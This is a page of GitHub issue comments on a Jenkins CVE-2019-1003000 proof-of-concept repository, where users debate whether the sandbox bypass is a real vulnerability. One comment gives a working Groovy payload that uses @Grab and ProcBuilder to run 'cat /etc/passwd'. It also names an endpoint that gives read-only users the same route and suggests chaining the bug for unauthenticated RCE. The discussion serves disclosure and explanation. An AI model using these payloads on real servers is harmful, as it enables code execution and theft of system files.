Comments (5)
Sigh...its still not a security problem... You used jenkins the way it was meant to be used... you logged in and performed an action withtin the limits the system allows, no trickery to achieve "RCE"... its not an exploit. Its a script on how to add a command to a job.
from cve-2019-1003000-jenkins-rce-poc.
@pbuckley4192 can you provide a proof of concept where logged in user with the ability to 'performed an action within the limits the system allows' can execute shell inside master node?
Indeed, a user with Administrator right or Overall/RunScripts permission can use /script
to execute shell via Groovy script, directly on the master node. But, suppose that a user only has access to a certain job inside distributed Jenkins. That job will execute some build scripts inside the slave node.
Usually, we can add groovy script to execute shell command inside the slave node. Example:
node {
sh "cat /etc/passwd"
}
That is the intended way of Jenkins, the one that was meant to be used because it's a feature. But, that user can't perform shell execution inside the master node. That's why the vulnerability described in https://cxsecurity.com/issue/WLB-2019020120 is indeed a mislead and actually a feature (not security vulnerability). But, the one in this repository is actually a vulnerability.
Example, we can use this script to execute shell with Groovy.
def sout = new StringBuilder(), serr = new StringBuilder()
def proc = 'cat /etc/passwd'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
But it will be rejected when you try to build because of sandbox/scriptsecurity.
When you use this Groovy script:
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
print new ProcBuilder("/bin/bash").withArgs("-c","cat /etc/passwd").run().getOutputString()
It will be executed and that's not the intended usability. It's because the unpatched Jenkins allows @Grab
which is an AST annotation to load external module (http://groovy-lang.org/metaprogramming.html). The patched Jenkins now disallow @Grab
.
The security implication of this is, the user with limited access (only can execute shell inside slave node ) can use this vulnerability to execute shell inside the master node. Imagine a big organization with hundreds of engineers. Only one has access to execute shell in master node and the rest only has access to execute shell in slave nodes for certain projects. This is indeed a security vulnerability.
The other scenario of this vulnerability (besides the one that is in this repository), a user with very limited permission (only Overall/Read, cannot configure or run job) can use this URL to execute sandboxed Groovy script.
https://URL/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=[script]
With the same vulnerability (but the different way of exploit), we can bypass the sandbox and user with Overall/Read permission can execute shell inside the master node.
Do you want the RCE without authentication at all? Combine with http://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html.
CMIIW
from cve-2019-1003000-jenkins-rce-poc.
Hi @pbuckley4192, As specified in README.md
, you need Job/Configure
permission for this exploit to work.
This exploit allows user (more specifically, regular non-administrative user) to bypass the sandbox protection and execute arbitrary code on the Jenkins server, whereas that is not the intended usage of Jenkins.
from cve-2019-1003000-jenkins-rce-poc.
You may also want to check out an article regarding the full exploit chain authored by the CVE reporter. I think they will publish it next week.
The exploit chain may allow you to do RCE without the need of Job/Configure
permission.
from cve-2019-1003000-jenkins-rce-poc.
@farisv Great writeup!! @adamyordan please put @farisv 's comment in the readme as an explaination!
Confirmed it with my production Jenkins (Jenkins with ~100 users), a Read only user was able to obtain a shell using that @grab
from cve-2019-1003000-jenkins-rce-poc.
Related Issues (4)
- can't exploit it HOT 1
- error HOT 1
- exploit doesnt work
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from cve-2019-1003000-jenkins-rce-poc.